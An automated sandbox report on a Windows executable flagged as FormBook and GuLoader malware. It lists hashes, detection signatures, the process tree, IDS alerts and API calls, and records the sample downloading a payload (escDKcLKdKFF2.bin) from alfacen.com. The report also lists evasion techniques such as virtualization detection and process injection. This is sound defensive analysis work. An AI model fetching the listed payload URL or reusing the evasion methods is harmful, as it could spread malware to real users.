Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0GuwV0t2UU.exe

Overview

General Information

Sample name:0GuwV0t2UU.exe
renamed because original name is a hash value
Original sample name:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff.exe
Analysis ID:1549467
MD5:4ea3d3a468f53ca1b57d8c2db7eb3037
SHA1:cf31eb62d544ebef441f5d2cc2e219d65bd43ad6
SHA256:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0GuwV0t2UU.exe (PID: 572 cmdline: "C:\Users\user\Desktop\0GuwV0t2UU.exe" MD5: 4EA3D3A468F53CA1B57D8C2DB7EB3037)
    • 0GuwV0t2UU.exe (PID: 5112 cmdline: "C:\Users\user\Desktop\0GuwV0t2UU.exe" MD5: 4EA3D3A468F53CA1B57D8C2DB7EB3037)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.3136688190.00000000049AA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-05T16:58:29.717909+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649746TCP
      2024-11-05T16:59:08.238423+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649934TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 0GuwV0t2UU.exeAvira: detected
      Source: 0GuwV0t2UU.exeReversingLabs: Detection: 58%
      Source: Yara matchFile source: 00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 0GuwV0t2UU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.6:49983 version: TLS 1.2
      Source: 0GuwV0t2UU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: 0GuwV0t2UU.exe, 00000006.00000003.3501913064.0000000037715000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3499817992.000000003756B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 0GuwV0t2UU.exe, 0GuwV0t2UU.exe, 00000006.00000003.3501913064.0000000037715000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3499817992.000000003756B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: Joe Sandbox ViewIP Address: 193.107.36.30 193.107.36.30
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49746
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49934
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /escDKcLKdKFF2.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: alfacen.com
      Source: 0GuwV0t2UU.exe, 00000000.00000000.2116328758.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000006.00000000.3132180633.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: 0GuwV0t2UU.exe, 00000006.00000002.3541181900.0000000007813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
      Source: 0GuwV0t2UU.exe, 00000006.00000002.3541181900.0000000007813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/&K
      Source: 0GuwV0t2UU.exe, 00000006.00000002.3541241912.0000000007829000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3500358754.0000000007827000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000002.3541090682.0000000007730000.00000004.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3500504716.0000000007827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/escDKcLKdKFF2.bin
      Source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.6:49983 version: TLS 1.2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379335C0 NtCreateMutant,LdrInitializeThunk,6_2_379335C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_37932DF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37933090 NtSetValueKey,6_2_37933090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37933010 NtOpenDirectoryObject,6_2_37933010
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37933D10 NtOpenProcessToken,6_2_37933D10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37933D70 NtOpenThread,6_2_37933D70
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379339B0 NtGetContextThread,6_2_379339B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37934650 NtSuspendThread,6_2_37934650
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37934340 NtSetContextThread,6_2_37934340
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932F90 NtProtectVirtualMemory,6_2_37932F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932FB0 NtResumeThread,6_2_37932FB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932FA0 NtQuerySection,6_2_37932FA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932FE0 NtCreateFile,6_2_37932FE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932F30 NtCreateSection,6_2_37932F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932F60 NtCreateProcessEx,6_2_37932F60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932E80 NtReadVirtualMemory,6_2_37932E80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932EA0 NtAdjustPrivilegesToken,6_2_37932EA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932EE0 NtQueueApcThread,6_2_37932EE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932E30 NtWriteVirtualMemory,6_2_37932E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932DB0 NtEnumerateKey,6_2_37932DB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932DD0 NtDelayExecution,6_2_37932DD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932D10 NtMapViewOfSection,6_2_37932D10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932D00 NtSetInformationFile,6_2_37932D00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932D30 NtUnmapViewOfSection,6_2_37932D30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932CA0 NtQueryInformationToken,6_2_37932CA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932CC0 NtQueryVirtualMemory,6_2_37932CC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932CF0 NtOpenProcess,6_2_37932CF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932C00 NtQueryInformationProcess,6_2_37932C00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932C70 NtFreeVirtualMemory,6_2_37932C70
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932C60 NtCreateKey,6_2_37932C60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932B80 NtQueryInformationFile,6_2_37932B80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932BA0 NtEnumerateValueKey,6_2_37932BA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932BF0 NtAllocateVirtualMemory,6_2_37932BF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932BE0 NtQueryValueKey,6_2_37932BE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932B60 NtClose,6_2_37932B60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932AB0 NtWaitForSingleObject,6_2_37932AB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932AD0 NtReadFile,6_2_37932AD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37932AF0 NtWriteFile,6_2_37932AF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00406DC00_2_00406DC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_738B1BFF0_2_738B1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BF7B06_2_379BF7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B16CC6_2_379B16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799D5B06_2_3799D5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B75716_2_379B7571
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BF43F6_2_379BF43F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F14606_2_378F1460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3794739A6_2_3794739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B132D6_2_379B132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED34C6_2_378ED34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379052A06_2_379052A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B2C06_2_3791B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A12ED6_2_379A12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790B1B06_2_3790B1B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CB16B6_2_379CB16B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF1726_2_378EF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3793516C6_2_3793516C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379070C06_2_379070C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF0CC6_2_379AF0CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B70E96_2_379B70E9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BF0E06_2_379BF0E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37901F926_2_37901F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BFFB16_2_379BFFB1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378C3FD56_2_378C3FD5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378C3FD26_2_378C3FD2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BFF096_2_379BFF09
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37909EB06_2_37909EB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791FDC06_2_3791FDC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B1D5A6_2_379B1D5A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37903D406_2_37903D40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B7D736_2_379B7D73
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BFCF26_2_379BFCF2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37979C326_2_37979C32
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791FB806_2_3791FB80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37975BF06_2_37975BF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3793DBF96_2_3793DBF9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BFB766_2_379BFB76
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37945AA06_2_37945AA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799DAAC6_2_3799DAAC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A1AA36_2_379A1AA3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379ADAC66_2_379ADAC6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BFA496_2_379BFA49
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B7A466_2_379B7A46
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37973A6C6_2_37973A6C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379959106_2_37995910
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379099506_2_37909950
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791B9506_2_3791B950
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379038E06_2_379038E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D8006_2_3796D800
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FC7C06_2_378FC7C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379247506_2_37924750
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379007706_2_37900770
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791C6E06_2_3791C6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C05916_2_379C0591
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379005356_2_37900535
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AE4F66_2_379AE4F6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A44206_2_379A4420
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B24466_2_379B2446
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790E3F06_2_3790E3F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C03E66_2_379C03E6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BA3526_2_379BA352
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379802C06_2_379802C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A02746_2_379A0274
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C01AA6_2_379C01AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B41A26_2_379B41A2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B81CC6_2_379B81CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799A1186_2_3799A118
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F01006_2_378F0100
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379881586_2_37988158
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379920006_2_37992000
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797EFA06_2_3797EFA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F2FC86_2_378F2FC8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790CFE06_2_3790CFE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37920F306_2_37920F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A2F306_2_379A2F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37942F286_2_37942F28
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37974F406_2_37974F40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37912E906_2_37912E90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BCE936_2_379BCE93
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BEEDB6_2_379BEEDB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BEE266_2_379BEE26
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37900E596_2_37900E59
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37918DBF6_2_37918DBF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FADE06_2_378FADE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799CD1F6_2_3799CD1F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790AD006_2_3790AD00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379A0CB56_2_379A0CB5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F0CF26_2_378F0CF2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37900C006_2_37900C00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B6BD76_2_379B6BD7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379BAB406_2_379BAB40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FEA806_2_378FEA80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379029A06_2_379029A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CA9A66_2_379CA9A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379169626_2_37916962
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E68B86_2_378E68B8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792E8F06_2_3792E8F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790A8406_2_3790A840
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379028406_2_37902840
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 37935130 appears 58 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 3796EA12 appears 86 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 37947E54 appears 102 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 378EB970 appears 280 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 3797F290 appears 105 times
      Source: 0GuwV0t2UU.exeStatic PE information: invalid certificate
      Source: 0GuwV0t2UU.exe, 00000006.00000003.3499817992.000000003768E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0GuwV0t2UU.exe
      Source: 0GuwV0t2UU.exe, 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0GuwV0t2UU.exe
      Source: 0GuwV0t2UU.exe, 00000006.00000003.3501913064.0000000037842000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0GuwV0t2UU.exe
      Source: 0GuwV0t2UU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/9@1/1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\fllesskabsejedeJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\AppData\Local\Temp\nsxBCAD.tmpJump to behavior
      Source: 0GuwV0t2UU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 0GuwV0t2UU.exeReversingLabs: Detection: 58%
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile read: C:\Users\user\Desktop\0GuwV0t2UU.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: apphelp.dllJump to behavior
